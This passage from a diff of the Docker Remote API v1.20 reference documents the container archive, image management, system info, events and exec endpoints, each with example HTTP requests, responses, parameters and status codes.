+-   **stderr** – 1/True/true or 0/False/false, if `logs=true`, return
+        `stderr` log, if `stream=true`, attach to `stderr`. Default `false`.
+
+**Status codes**:
+
+-   **200** – no error
+-   **400** – bad parameter
+-   **404** – no such container
+-   **500** – server error
+
+#### Wait a container
+
+`POST /containers/(id or name)/wait`
+
+Block until container `id` stops, then returns the exit code
+
+**Example request**:
+
+    POST /v1.20/containers/16253994b7c4/wait HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {"StatusCode": 0}
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Remove a container
+
+`DELETE /containers/(id or name)`
+
+Remove the container `id` from the filesystem
+
+**Example request**:
+
+    DELETE /v1.20/containers/16253994b7c4?v=1 HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Query parameters**:
+
+-   **v** – 1/True/true or 0/False/false, Remove the volumes
+        associated to the container. Default `false`.
+-   **force** - 1/True/true or 0/False/false, Kill then remove the container.
+        Default `false`.
+
+**Status codes**:
+
+-   **204** – no error
+-   **400** – bad parameter
+-   **404** – no such container
+-   **409** – conflict
+-   **500** – server error
+
+#### Copy files or folders from a container
+
+`POST /containers/(id or name)/copy`
+
+Copy files or folders of container `id`
+
+**Deprecated** in favor of the `archive` endpoint below.
+
+**Example request**:
+
+    POST /v1.20/containers/4fa6e0f0c678/copy HTTP/1.1
+    Content-Type: application/json
+
+    {
+         "Resource": "test.txt"
+    }
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/x-tar
+
+    {% raw %}
+    {{ TAR STREAM }}
+    {% endraw %}
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Retrieving information about files and folders in a container
+
+`HEAD /containers/(id or name)/archive`
+
+See the description of the `X-Docker-Container-Path-Stat` header in the
+following section.
+
+#### Get an archive of a filesystem resource in a container
+
+`GET /containers/(id or name)/archive`
+
+Get a tar archive of a resource in the filesystem of container `id`.
+
+**Query parameters**:
+
+- **path** - resource in the container's filesystem to archive. Required.
+
+    If not an absolute path, it is relative to the container's root directory.
+    The resource specified by **path** must exist. To assert that the resource
+    is expected to be a directory, **path** should end in `/` or  `/.`
+    (assuming a path separator of `/`). If **path** ends in `/.` then this
+    indicates that only the contents of the **path** directory should be
+    copied. A symlink is always resolved to its target.
+
+    > **Note**: It is not possible to copy certain system files such as resources
+    > under `/proc`, `/sys`, `/dev`, and mounts created by the user in the
+    > container.
+
+**Example request**:
+
+    GET /v1.20/containers/8cce319429b2/archive?path=/root HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/x-tar
+    X-Docker-Container-Path-Stat: eyJuYW1lIjoicm9vdCIsInNpemUiOjQwOTYsIm1vZGUiOjIxNDc0ODQwOTYsIm10aW1lIjoiMjAxNC0wMi0yN1QyMDo1MToyM1oiLCJsaW5rVGFyZ2V0IjoiIn0=
+
+    {% raw %}
+    {{ TAR STREAM }}
+    {% endraw %}
+
+On success, a response header `X-Docker-Container-Path-Stat` will be set to a
+base64-encoded JSON object containing some filesystem header information about
+the archived resource. The above example value would decode to the following
+JSON object (whitespace added for readability):
+
+```json
+{
+    "name": "root",
+    "size": 4096,
+    "mode": 2147484096,
+    "mtime": "2014-02-27T20:51:23Z",
+    "linkTarget": ""
+}
+```
+
+A `HEAD` request can also be made to this endpoint if only this information is
+desired.
+
+**Status codes**:
+
+- **200** - success, returns archive of copied resource
+- **400** - client error, bad parameter, details in JSON response body, one of:
+    - must specify path parameter (**path** cannot be empty)
+    - not a directory (**path** was asserted to be a directory but exists as a
+      file)
+- **404** - client error, resource not found, one of:
+    – no such container (container `id` does not exist)
+    - no such file or directory (**path** does not exist)
+- **500** - server error
+
+#### Extract an archive of files or folders to a directory in a container
+
+`PUT /containers/(id or name)/archive`
+
+Upload a tar archive to be extracted to a path in the filesystem of container
+`id`.
+
+**Query parameters**:
+
+- **path** - path to a directory in the container
+    to extract the archive's contents into. Required.
+
+    If not an absolute path, it is relative to the container's root directory.
+    The **path** resource must exist.
+- **noOverwriteDirNonDir** - If "1", "true", or "True" then it will be an error
+    if unpacking the given content would cause an existing directory to be
+    replaced with a non-directory and vice versa.
+
+**Example request**:
+
+    PUT /v1.20/containers/8cce319429b2/archive?path=/vol1 HTTP/1.1
+    Content-Type: application/x-tar
+
+    {% raw %}
+    {{ TAR STREAM }}
+    {% endraw %}
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+
+**Status codes**:
+
+- **200** – the content was extracted successfully
+- **400** - client error, bad parameter, details in JSON response body, one of:
+    - must specify path parameter (**path** cannot be empty)
+    - not a directory (**path** should be a directory but exists as a file)
+    - unable to overwrite existing directory with non-directory
+      (if **noOverwriteDirNonDir**)
+    - unable to overwrite existing non-directory with directory
+      (if **noOverwriteDirNonDir**)
+- **403** - client error, permission denied, the volume
+    or container rootfs is marked as read-only.
+- **404** - client error, resource not found, one of:
+    – no such container (container `id` does not exist)
+    - no such file or directory (**path** resource does not exist)
+- **500** – server error
+
+### 2.2 Images
+
+#### List Images
+
+`GET /images/json`
+
+**Example request**:
+
+    GET /v1.20/images/json?all=0 HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    [
+      {
+         "RepoTags": [
+           "ubuntu:12.04",
+           "ubuntu:precise",
+           "ubuntu:latest"
+         ],
+         "Id": "8dbd9e392a964056420e5d58ca5cc376ef18e2de93b5cc90e868a1bbc8318c1c",
+         "Created": 1365714795,
+         "Size": 131506275,
+         "VirtualSize": 131506275,
+         "Labels": {}
+      },
+      {
+         "RepoTags": [
+           "ubuntu:12.10",
+           "ubuntu:quantal"
+         ],
+         "ParentId": "27cf784147099545",
+         "Id": "b750fe79269d2ec9a3c593ef05b4332b1d1a02a62b4accb2c21d589ff2f5f2dc",
+         "Created": 1364102658,
+         "Size": 24653,
+         "VirtualSize": 180116135,
+         "Labels": {
+            "com.example.version": "v1"
+         }
+      }
+    ]
+
+**Example request, with digest information**:
+
+    GET /v1.20/images/json?digests=1 HTTP/1.1
+
+**Example response, with digest information**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    [
+      {
+        "Created": 1420064636,
+        "Id": "4986bf8c15363d1c5d15512d5266f8777bfba4974ac56e3270e7760f6f0a8125",
+        "ParentId": "ea13149945cb6b1e746bf28032f02e9b5a793523481a0a18645fc77ad53c4ea2",
+        "RepoDigests": [
+          "localhost:5000/test/busybox@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf"
+        ],
+        "RepoTags": [
+          "localhost:5000/test/busybox:latest",
+          "playdate:latest"
+        ],
+        "Size": 0,
+        "VirtualSize": 2429728,
+        "Labels": {}
+      }
+    ]
+
+The response shows a single image `Id` associated with two repositories
+(`RepoTags`): `localhost:5000/test/busybox`: and `playdate`. A caller can use
+either of the `RepoTags` values `localhost:5000/test/busybox:latest` or
+`playdate:latest` to reference the image.
+
+You can also use `RepoDigests` values to reference an image. In this response,
+the array has only one reference and that is to the
+`localhost:5000/test/busybox` repository; the `playdate` repository has no
+digest. You can reference this digest using the value:
+`localhost:5000/test/busybox@sha256:cbbf2f9a99b47fc460d...`
+
+See the `docker run` and `docker build` commands for examples of digest and tag
+references on the command line.
+
+**Query parameters**:
+
+-   **all** – 1/True/true or 0/False/false, default false
+-   **filters** – a JSON encoded value of the filters (a map[string][]string) to process on the images list. Available filters:
+  -   `dangling=true`
+  -   `label=key` or `label="key=value"` of an image label
+-   **filter** - only return images with the specified name
+
+#### Build image from a Dockerfile
+
+`POST /build`
+
+Build an image from a Dockerfile
+
+**Example request**:
+
+    POST /v1.20/build HTTP/1.1
+
+    {% raw %}
+    {{ TAR STREAM }}
+    {% endraw %}
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {"stream": "Step 1/5..."}
+    {"stream": "..."}
+    {"error": "Error...", "errorDetail": {"code": 123, "message": "Error..."}}
+
+The input stream must be a `tar` archive compressed with one of the
+following algorithms: `identity` (no compression), `gzip`, `bzip2`, `xz`.
+
+The archive must include a build instructions file, typically called
+`Dockerfile` at the archive's root. The `dockerfile` parameter may be
+used to specify a different build instructions file. To do this, its value must be
+the path to the alternate build instructions file to use.
+
+The archive may include any number of other files,
+which are accessible in the build context (See the [*ADD build
+command*](../reference/builder.md#add)).
+
+The Docker daemon performs a preliminary validation of the `Dockerfile` before
+starting the build, and returns an error if the syntax is incorrect. After that,
+each instruction is run one-by-one until the ID of the new image is output.
+
+The build is canceled if the client drops the connection by quitting
+or being killed.
+
+**Query parameters**:
+
+-   **dockerfile** - Path within the build context to the `Dockerfile`. This is
+        ignored if `remote` is specified and points to an external `Dockerfile`.
+-   **t** – A name and optional tag to apply to the image in the `name:tag` format.
+        If you omit the `tag` the default `latest` value is assumed.
+-   **remote** – A Git repository URI or HTTP/HTTPS context URI. If the
+        URI points to a single text file, the file's contents are placed into
+        a file called `Dockerfile` and the image is built from that file. If
+        the URI points to a tarball, the file is downloaded by the daemon and
+        the contents therein used as the context for the build. If the URI
+        points to a tarball and the `dockerfile` parameter is also specified,
+        there must be a file with the corresponding path inside the tarball.
+-   **q** – Suppress verbose build output.
+-   **nocache** – Do not use the cache when building the image.
+-   **pull** - Attempt to pull the image even if an older image exists locally.
+-   **rm** - Remove intermediate containers after a successful build (default behavior).
+-   **forcerm** - Always remove intermediate containers (includes `rm`).
+-   **memory** - Set memory limit for build.
+-   **memswap** - Total memory (memory + swap), `-1` to enable unlimited swap.
+-   **cpushares** - CPU shares (relative weight).
+-   **cpusetcpus** - CPUs in which to allow execution (e.g., `0-3`, `0,1`).
+-   **cpuperiod** - The length of a CPU period in microseconds.
+-   **cpuquota** - Microseconds of CPU time that the container can get in a CPU period.
+
+**Request Headers**:
+
+-   **Content-type** – Set to `"application/tar"`.
+-   **X-Registry-Config** – A base64-url-safe-encoded Registry Auth Config JSON
+        object with the following structure:
+
+            {
+                "docker.example.com": {
+                    "username": "janedoe",
+                    "password": "hunter2"
+                },
+                "https://index.docker.io/v1/": {
+                    "username": "mobydock",
+                    "password": "conta1n3rize14"
+                }
+            }
+
+    This object maps the hostname of a registry to an object containing the
+    "username" and "password" for that registry. Multiple registries may
+    be specified as the build may be based on an image requiring
+    authentication to pull from any arbitrary registry. Only the registry
+    domain name (and port if not the default "443") are required. However
+    (for legacy reasons) the "official" Docker, Inc. hosted registry must
+    be specified with both a "https://" prefix and a "/v1/" suffix even
+    though Docker will prefer to use the v2 registry API.
+
+**Status codes**:
+
+-   **200** – no error
+-   **500** – server error
+
+#### Create an image
+
+`POST /images/create`
+
+Create an image either by pulling it from the registry or by importing it
+
+**Example request**:
+
+    POST /v1.20/images/create?fromImage=busybox&tag=latest HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {"status": "Pulling..."}
+    {"status": "Pulling", "progress": "1 B/ 100 B", "progressDetail": {"current": 1, "total": 100}}
+    {"error": "Invalid..."}
+    ...
+
+When using this endpoint to pull an image from the registry, the
+`X-Registry-Auth` header can be used to include
+a base64-encoded AuthConfig object.
+
+**Query parameters**:
+
+-   **fromImage** – Name of the image to pull.
+-   **fromSrc** – Source to import.  The value may be a URL from which the image
+        can be retrieved or `-` to read the image from the request body.
+-   **repo** – Repository name.
+-   **tag** – Tag. If empty when pulling an image, this causes all tags
+        for the given image to be pulled.
+
+**Request Headers**:
+
+-   **X-Registry-Auth** – base64-encoded AuthConfig object
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** - repository does not exist or no read access
+-   **500** – server error
+
+
+
+#### Inspect an image
+
+`GET /images/(name)/json`
+
+Return low-level information on the image `name`
+
+**Example request**:
+
+    GET /v1.20/images/ubuntu/json HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {
+       "Created": "2013-03-23T22:24:18.818426-07:00",
+       "Container": "3d67245a8d72ecf13f33dffac9f79dcdf70f75acb84d308770391510e0c23ad0",
+       "ContainerConfig": {
+          "Hostname": "",
+          "User": "",
+          "AttachStdin": false,
+          "AttachStdout": false,
+          "AttachStderr": false,
+          "Tty": true,
+          "OpenStdin": true,
+          "StdinOnce": false,
+          "Env": null,
+          "Cmd": ["/bin/bash"],
+          "Dns": null,
+          "Image": "ubuntu",
+          "Labels": {
+             "com.example.vendor": "Acme",
+             "com.example.license": "GPL",
+             "com.example.version": "1.0"
+          },
+          "Volumes": null,
+          "VolumesFrom": "",
+          "WorkingDir": ""
+       },
+       "Id": "b750fe79269d2ec9a3c593ef05b4332b1d1a02a62b4accb2c21d589ff2f5f2dc",
+       "Parent": "27cf784147099545",
+       "Size": 6824592
+    }
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such image
+-   **500** – server error
+
+#### Get the history of an image
+
+`GET /images/(name)/history`
+
+Return the history of the image `name`
+
+**Example request**:
+
+    GET /v1.20/images/ubuntu/history HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    [
+        {
+            "Id": "3db9c44f45209632d6050b35958829c3a2aa256d81b9a7be45b362ff85c54710",
+            "Created": 1398108230,
+            "CreatedBy": "/bin/sh -c #(nop) ADD file:eb15dbd63394e063b805a3c32ca7bf0266ef64676d5a6fab4801f2e81e2a5148 in /",
+            "Tags": [
+                "ubuntu:lucid",
+                "ubuntu:10.04"
+            ],
+            "Size": 182964289,
+            "Comment": ""
+        },
+        {
+            "Id": "6cfa4d1f33fb861d4d114f43b25abd0ac737509268065cdfd69d544a59c85ab8",
+            "Created": 1398108222,
+            "CreatedBy": "/bin/sh -c #(nop) MAINTAINER Tianon Gravi <admwiggin@gmail.com> - mkimage-debootstrap.sh -i iproute,iputils-ping,ubuntu-minimal -t lucid.tar.xz lucid http://archive.ubuntu.com/ubuntu/",
+            "Tags": null,
+            "Size": 0,
+            "Comment": ""
+        },
+        {
+            "Id": "511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158",
+            "Created": 1371157430,
+            "CreatedBy": "",
+            "Tags": [
+                "scratch12:latest",
+                "scratch:latest"
+            ],
+            "Size": 0,
+            "Comment": "Imported from -"
+        }
+    ]
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such image
+-   **500** – server error
+
+#### Push an image on the registry
+
+`POST /images/(name)/push`
+
+Push the image `name` on the registry
+
+**Example request**:
+
+    POST /v1.20/images/test/push HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {"status": "Pushing..."}
+    {"status": "Pushing", "progress": "1/? (n/a)", "progressDetail": {"current": 1}}}
+    {"error": "Invalid..."}
+    ...
+
+If you wish to push an image on to a private registry, that image must already have a tag
+into a repository which references that registry `hostname` and `port`.  This repository name should
+then be used in the URL. This duplicates the command line's flow.
+
+**Example request**:
+
+    POST /v1.20/images/registry.acme.com:5000/test/push HTTP/1.1
+
+
+**Query parameters**:
+
+-   **tag** – The tag to associate with the image on the registry. This is optional.
+
+**Request Headers**:
+
+-   **X-Registry-Auth** – base64-encoded AuthConfig object.
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such image
+-   **500** – server error
+
+#### Tag an image into a repository
+
+`POST /images/(name)/tag`
+
+Tag the image `name` into a repository
+
+**Example request**:
+
+    POST /v1.20/images/test/tag?repo=myrepo&force=0&tag=v42 HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 201 Created
+
+**Query parameters**:
+
+-   **repo** – The repository to tag in
+-   **force** – 1/True/true or 0/False/false, default false
+-   **tag** - The new tag name
+
+**Status codes**:
+
+-   **201** – no error
+-   **400** – bad parameter
+-   **404** – no such image
+-   **409** – conflict
+-   **500** – server error
+
+#### Remove an image
+
+`DELETE /images/(name)`
+
+Remove the image `name` from the filesystem
+
+**Example request**:
+
+    DELETE /v1.20/images/test HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-type: application/json
+
+    [
+     {"Untagged": "3e2f21a89f"},
+     {"Deleted": "3e2f21a89f"},
+     {"Deleted": "53b4f83ac9"}
+    ]
+
+**Query parameters**:
+
+-   **force** – 1/True/true or 0/False/false, default false
+-   **noprune** – 1/True/true or 0/False/false, default false
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such image
+-   **409** – conflict
+-   **500** – server error
+
+#### Search images
+
+`GET /images/search`
+
+Search for an image on [Docker Hub](https://hub.docker.com).
+
+> **Note**:
+> The response keys have changed from API v1.6 to reflect the JSON
+> sent by the registry server to the docker daemon's request.
+
+**Example request**:
+
+    GET /v1.20/images/search?term=sshd HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    [
+            {
+                "description": "",
+                "is_official": false,
+                "is_automated": false,
+                "name": "wma55/u1210sshd",
+                "star_count": 0
+            },
+            {
+                "description": "",
+                "is_official": false,
+                "is_automated": false,
+                "name": "jdswinbank/sshd",
+                "star_count": 0
+            },
+            {
+                "description": "",
+                "is_official": false,
+                "is_automated": false,
+                "name": "vgauthier/sshd",
+                "star_count": 0
+            }
+    ...
+    ]
+
+**Query parameters**:
+
+-   **term** – term to search
+
+**Status codes**:
+
+-   **200** – no error
+-   **500** – server error
+
+### 2.3 Misc
+
+#### Check auth configuration
+
+`POST /auth`
+
+Get the default username and email
+
+**Example request**:
+
+    POST /v1.20/auth HTTP/1.1
+    Content-Type: application/json
+
+    {
+         "username": "hannibal",
+         "password": "xxxx",
+         "email": "hannibal@a-team.com",
+         "serveraddress": "https://index.docker.io/v1/"
+    }
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+
+**Status codes**:
+
+-   **200** – no error
+-   **204** – no error
+-   **500** – server error
+
+#### Display system-wide information
+
+`GET /info`
+
+Display system-wide information
+
+**Example request**:
+
+    GET /v1.20/info HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {
+        "Containers": 11,
+        "CpuCfsPeriod": true,
+        "CpuCfsQuota": true,
+        "Debug": false,
+        "DockerRootDir": "/var/lib/docker",
+        "Driver": "btrfs",
+        "DriverStatus": [[""]],
+        "ExecutionDriver": "native-0.1",
+        "ExperimentalBuild": false,
+        "HttpProxy": "http://test:test@localhost:8080",
+        "HttpsProxy": "https://test:test@localhost:8080",
+        "ID": "7TRN:IPZB:QYBB:VPBQ:UMPP:KARE:6ZNR:XE6T:7EWV:PKF4:ZOJD:TPYS",
+        "IPv4Forwarding": true,
+        "Images": 16,
+        "IndexServerAddress": "https://index.docker.io/v1/",
+        "InitPath": "/usr/bin/docker",
+        "InitSha1": "",
+        "KernelVersion": "3.12.0-1-amd64",
+        "Labels": [
+            "storage=ssd"
+        ],
+        "MemTotal": 2099236864,
+        "MemoryLimit": true,
+        "NCPU": 1,
+        "NEventsListener": 0,
+        "NFd": 11,
+        "NGoroutines": 21,
+        "Name": "prod-server-42",
+        "NoProxy": "9.81.1.160",
+        "OomKillDisable": true,
+        "OperatingSystem": "Boot2Docker",
+        "RegistryConfig": {
+            "IndexConfigs": {
+                "docker.io": {
+                    "Mirrors": null,
+                    "Name": "docker.io",
+                    "Official": true,
+                    "Secure": true
+                }
+            },
+            "InsecureRegistryCIDRs": [
+                "127.0.0.0/8"
+            ]
+        },
+        "SwapLimit": false,
+        "SystemTime": "2015-03-10T11:11:23.730591467-07:00"
+    }
+
+**Status codes**:
+
+-   **200** – no error
+-   **500** – server error
+
+#### Show the docker version information
+
+`GET /version`
+
+Show the docker version information
+
+**Example request**:
+
+    GET /v1.20/version HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {
+         "Version": "1.5.0",
+         "Os": "linux",
+         "KernelVersion": "3.18.5-tinycore64",
+         "GoVersion": "go1.4.1",
+         "GitCommit": "a8a31ef",
+         "Arch": "amd64",
+         "ApiVersion": "1.20",
+         "Experimental": false
+    }
+
+**Status codes**:
+
+-   **200** – no error
+-   **500** – server error
+
+#### Ping the docker server
+
+`GET /_ping`
+
+Ping the docker server
+
+**Example request**:
+
+    GET /v1.20/_ping HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: text/plain
+
+    OK
+
+**Status codes**:
+
+-   **200** - no error
+-   **500** - server error
+
+#### Create a new image from a container's changes
+
+`POST /commit`
+
+Create a new image from a container's changes
+
+**Example request**:
+
+    POST /v1.20/commit?container=44c004db4b17&comment=message&repo=myrepo HTTP/1.1
+    Content-Type: application/json
+
+    {
+         "Hostname": "",
+         "Domainname": "",
+         "User": "",
+         "AttachStdin": false,
+         "AttachStdout": true,
+         "AttachStderr": true,
+         "Tty": false,
+         "OpenStdin": false,
+         "StdinOnce": false,
+         "Env": null,
+         "Cmd": [
+                 "date"
+         ],
+         "Mounts": [
+           {
+             "Source": "/data",
+             "Destination": "/data",
+             "Mode": "ro,Z",
+             "RW": false
+           }
+         ],
+         "Labels": {
+                 "key1": "value1",
+                 "key2": "value2"
+          },
+         "WorkingDir": "",
+         "NetworkDisabled": false,
+         "ExposedPorts": {
+                 "22/tcp": {}
+         }
+    }
+
+**Example response**:
+
+    HTTP/1.1 201 Created
+    Content-Type: application/json
+
+    {"Id": "596069db4bf5"}
+
+**JSON parameters**:
+
+-  **config** - the container's configuration
+
+**Query parameters**:
+
+-   **container** – source container
+-   **repo** – repository
+-   **tag** – tag
+-   **comment** – commit message
+-   **author** – author (e.g., "John Hannibal Smith
+    <[hannibal@a-team.com](mailto:hannibal%40a-team.com)>")
+-   **pause** – 1/True/true or 0/False/false, whether to pause the container before committing
+-   **changes** – Dockerfile instructions to apply while committing
+
+**Status codes**:
+
+-   **201** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Monitor Docker's events
+
+`GET /events`
+
+Get container events from docker, in real time via streaming.
+
+Docker containers report the following events:
+
+    attach, commit, copy, create, destroy, die, exec_create, exec_start, export, kill, oom, pause, rename, resize, restart, start, stop, top, unpause
+
+Docker images report the following events:
+
+    delete, import, pull, push, tag, untag
+
+**Example request**:
+
+    GET /v1.20/events?since=1374067924
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {"status": "create", "id": "dfdf82bd3881","from": "ubuntu:latest", "time":1374067924}
+    {"status": "start", "id": "dfdf82bd3881","from": "ubuntu:latest", "time":1374067924}
+    {"status": "stop", "id": "dfdf82bd3881","from": "ubuntu:latest", "time":1374067966}
+    {"status": "destroy", "id": "dfdf82bd3881","from": "ubuntu:latest", "time":1374067970}
+
+**Query parameters**:
+
+-   **since** – Timestamp. Show all events created since timestamp and then stream
+-   **until** – Timestamp. Show events created until given timestamp and stop streaming
+-   **filters** – A json encoded value of the filters (a map[string][]string) to process on the event list. Available filters:
+  -   `container=<string>`; -- container to filter
+  -   `event=<string>`; -- event to filter
+  -   `image=<string>`; -- image to filter
+
+**Status codes**:
+
+-   **200** – no error
+-   **500** – server error
+
+#### Get a tarball containing all images in a repository
+
+`GET /images/(name)/get`
+
+Get a tarball containing all images and metadata for the repository specified
+by `name`.
+
+If `name` is a specific name and tag (e.g. ubuntu:latest), then only that image
+(and its parents) are returned. If `name` is an image ID, similarly only that
+image (and its parents) are returned, but with the exclusion of the
+'repositories' file in the tarball, as there were no image names referenced.
+
+See the [image tarball format](#image-tarball-format) for more details.
+
+**Example request**
+
+    GET /v1.20/images/ubuntu/get
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/x-tar
+
+    Binary data stream
+
+**Status codes**:
+
+-   **200** – no error
+-   **500** – server error
+
+#### Get a tarball containing all images
+
+`GET /images/get`
+
+Get a tarball containing all images and metadata for one or more repositories.
+
+For each value of the `names` parameter: if it is a specific name and tag (e.g.
+`ubuntu:latest`), then only that image (and its parents) are returned; if it is
+an image ID, similarly only that image (and its parents) are returned and there
+would be no names referenced in the 'repositories' file for this image ID.
+
+See the [image tarball format](#image-tarball-format) for more details.
+
+**Example request**
+
+    GET /v1.20/images/get?names=myname%2Fmyapp%3Alatest&names=busybox
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/x-tar
+
+    Binary data stream
+
+**Status codes**:
+
+-   **200** – no error
+-   **500** – server error
+
+#### Load a tarball with a set of images and tags into docker
+
+`POST /images/load`
+
+Load a set of images and tags into a Docker repository.
+See the [image tarball format](#image-tarball-format) for more details.
+
+**Example request**
+
+    POST /v1.20/images/load
+    Content-Type: application/x-tar
+
+    Tarball in body
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+
+**Status codes**:
+
+-   **200** – no error
+-   **500** – server error
+
+#### Image tarball format
+
+An image tarball contains one directory per image layer (named using its long ID),
+each containing these files:
+
+- `VERSION`: currently `1.0` - the file format version
+- `json`: detailed layer information, similar to `docker inspect layer_id`
+- `layer.tar`: A tarfile containing the filesystem changes in this layer
+
+The `layer.tar` file contains `aufs` style `.wh..wh.aufs` files and directories
+for storing attribute changes and deletions.
+
+If the tarball defines a repository, the tarball should also include a `repositories` file at
+the root that contains a list of repository and tag names mapped to layer IDs.
+
+```
+{"hello-world":
+    {"latest": "565a9d68a73f6706862bfe8409a7f659776d4d60a8d096eb4a3cbce6999cc2a1"}
+}
+```
+
+#### Exec Create
+
+`POST /containers/(id or name)/exec`
+
+Sets up an exec instance in a running container `id`
+
+**Example request**:
+
+    POST /v1.20/containers/e90e34656806/exec HTTP/1.1
+    Content-Type: application/json
+
+    {
+      "AttachStdin": true,
+      "AttachStdout": true,
+      "AttachStderr": true,
+      "Cmd": ["sh"],
+      "Tty": true,
+      "User": "123:456"
+    }
+
+**Example response**:
+
+    HTTP/1.1 201 Created
+    Content-Type: application/json
+
+    {
+         "Id": "f90e34656806",
+         "Warnings":[]
+    }
+
+**JSON parameters**:
+
+-   **AttachStdin** - Boolean value, attaches to `stdin` of the `exec` command.
+-   **AttachStdout** - Boolean value, attaches to `stdout` of the `exec` command.
+-   **AttachStderr** - Boolean value, attaches to `stderr` of the `exec` command.
+-   **Tty** - Boolean value to allocate a pseudo-TTY.
+-   **Cmd** - Command to run specified as a string or an array of strings.
+-   **User** - A string value specifying the user, and optionally, group to run
+        the exec process inside the container. Format is one of: `"user"`,
+        `"user:group"`, `"uid"`, or `"uid:gid"`.
+
+**Status codes**:
+
+-   **201** – no error
+-   **404** – no such container
+
+#### Exec Start
+
+`POST /exec/(id)/start`
+
+Starts a previously set up `exec` instance `id`. If `detach` is true, this API
+returns after starting the `exec` command. Otherwise, this API sets up an
+interactive session with the `exec` command.
+
+**Example request**:
+
+    POST /v1.20/exec/e90e34656806/start HTTP/1.1
+    Content-Type: application/json
+
+    {
+     "Detach": false,
+     "Tty": false
+    }
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/vnd.docker.raw-stream
+
+    {% raw %}
+    {{ STREAM }}
+    {% endraw %}
+
+**JSON parameters**:
+
+-   **Detach** - Detach from the `exec` command.
+-   **Tty** - Boolean value to allocate a pseudo-TTY.
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such exec instance
+
+**Stream details**:
+
+Similar to the stream behavior of `POST /containers/(id or name)/attach` API
+
+#### Exec Resize
+
+`POST /exec/(id)/resize`
+
+Resizes the `tty` session used by the `exec` command `id`.  The unit is number of characters.
+This API is valid only if `tty` was specified as part of creating and starting the `exec` command.
+
+**Example request**:
+
+    POST /v1.20/exec/e90e34656806/resize?h=40&w=80 HTTP/1.1
+    Content-Type: text/plain
+
+**Example response**:
+
+    HTTP/1.1 201 Created
+    Content-Type: text/plain
+
+**Query parameters**:
+
+-   **h** – height of `tty` session
+-   **w** – width
+
+**Status codes**:
+
+-   **201** – no error
+-   **404** – no such exec instance
+
+#### Exec Inspect
+
+`GET /exec/(id)/json`
+
+Return low-level information about the `exec` command `id`.
+
+**Example request**:
+
+    GET /v1.20/exec/11fb006128e8ceb3942e7c58d77750f24210e35f879dd204ac975c184b820b39/json HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: plain/text
+
+    {
+      "ID" : "11fb006128e8ceb3942e7c58d77750f24210e35f879dd204ac975c184b820b39",
+      "Running" : false,
+      "ExitCode" : 2,
+      "ProcessConfig" : {
+        "privileged" : false,
+        "user" : "",
+        "tty" : false,
+        "entrypoint" : "sh",
+        "arguments" : [
+          "-c",
+          "exit 2"
+        ]
+      },
+      "OpenStdin" : false,
+      "OpenStderr" : false,
+      "OpenStdout" : false,
+      "Container" : {
+        "State" : {
+          "Running" : true,
+          "Paused" : false,
+          "Restarting" : false,
+          "OOMKilled" : false,
+          "Pid" : 3650,
+          "ExitCode" : 0,
+          "Error" : "",
+          "StartedAt" : "2014-11-17T22:26:03.717657531Z",
+          "FinishedAt" : "0001-01-01T00:00:00Z"
+        },
+        "ID" : "8f177a186b977fb451136e0fdf182abff5599a08b3c7f6ef0d36a55aaf89634c",
+        "Created" : "2014-11-17T22:26:03.626304998Z",
+        "Path" : "date",
+        "Args" : [],
+        "Config" : {
+          "Hostname" : "8f177a186b97",
+          "Domainname" : "",
+          "User" : "",
+          "AttachStdin" : false,
+          "AttachStdout" : false,
+          "AttachStderr" : false,
+          "ExposedPorts" : null,
+          "Tty" : false,
+          "OpenStdin" : false,
+          "StdinOnce" : false,
+          "Env" : [ "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" ],
+          "Cmd" : [
+            "date"
+          ],
+          "Image" : "ubuntu",
+          "Volumes" : null,
+          "WorkingDir" : "",
+          "Entrypoint" : null,
+          "NetworkDisabled" : false,
+          "MacAddress" : "",
